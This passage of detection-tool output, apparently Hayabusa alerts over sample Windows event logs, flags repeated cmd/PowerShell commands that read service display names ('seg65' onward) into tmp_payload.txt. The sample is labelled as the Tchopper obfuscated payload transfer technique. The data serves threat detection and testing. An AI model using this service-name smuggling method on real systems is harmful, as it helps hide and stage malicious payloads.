+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 